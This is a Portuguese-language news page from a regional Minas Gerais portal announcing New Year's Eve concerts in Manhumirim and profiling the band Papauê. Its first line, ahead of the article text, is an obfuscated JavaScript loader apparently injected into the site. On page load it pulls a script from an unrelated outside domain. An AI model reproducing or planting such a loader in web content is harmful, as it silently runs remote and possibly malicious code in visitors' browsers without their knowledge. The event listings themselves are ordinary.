;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fim de ano em Manhumirim - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Fim de ano em Manhumirim

Dia 30, 21 horas, Banda Arena Pop de Manhumirim; 23 horas, Banda PAPAUÊ de Belo Horizonte.,
Dia 31, 22 horas, DJ; Meia noite, Queima de fogos – Show Pirotécnico, e logo após, recebendo 2012,
Banda, Beijo Marcado.
Local: Praça Padre Júlio Maria, Centro
Banda Papauê
PAPAUÊ “O groove maciço do axé”
Após 5 anos de estrada, a PAPAUÊ, formada por Juninho e os irmãos Léo e Jacson Amaral, se firma cada vez mais como sendo uma das principais bandas de axé no cenário mineiro. O trabalho, a dedicação e uma pitada de sorte, compõem a caminhada desse trio, que a frente da PAPAUÊ vem conseguindo cada vez mais atingir ao público com suas músicas, seus shows e seu carisma.
Uma história que começou em Almenara, cidade do norte de Minas Gerais, com os irmãos Léo e Jacson Amaral, tomou proporções maiores a partir de 2004, quando já em Belo Horizonte conheceram Juninho que compartilhando daquele sonho, uniram forças para fazer com que ele se tornasse uma realidade.
Carnavais, micaretas e grandes eventos por todo o Brasil, marcam o decorrer dessa trajetória. Programas de grande notoriedade, tanto na TV quanto no rádio, fizeram com que a PAPAUÊ ficasse cada vez mais conhecida em todo o Brasil, mas principalmente em Minas Gerais e Bahia.
2009 começou com o pé direito, e o primeiro passo foi a gravação do CD: PAPAUÊ – Ao vivo em Iuiú – Bahia. Gravado em trio elétrico esse CD traz 5 composições inéditas (“CERVEJA”, “GIGOLÔ”, “ADEUS GOOD BYE” e “SEU TUDO DE BOM”), essas quatro de autoria da banda e mais uma, “TA PARADO AÍ POR QUE”? (DO OUTRO LADO DA CORDA), de autoria dos baianos Maicon Brasileiro e Wostinho Nascimento, compositores renomados de Salvador/BA, além de um show com regravações de artistas de sucesso.
A grande repercussão do CD: PAPAUÊ – Ao vivo em Iuiú – Bahia, fez com que a banda decidisse transformar isso em um DVD recheado de luzes, cores e uma grande produção artística e musical. O intuito é fazer com que mais pessoas possam conhecer a banda, o show enfim, toda a energia da PAPAUÊ.
Manhumirim espera por você!
Realização: Secretaria de Esportes, Lazer e Turismo – Prefeitura de
Manhumirim – Administração 2005 – 2012 – Governo de todos, cidade para
todos.

Valdir Vieira – Assessoria de Comunicação – Prefeitura de Manhumirim


Ofertas

 

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.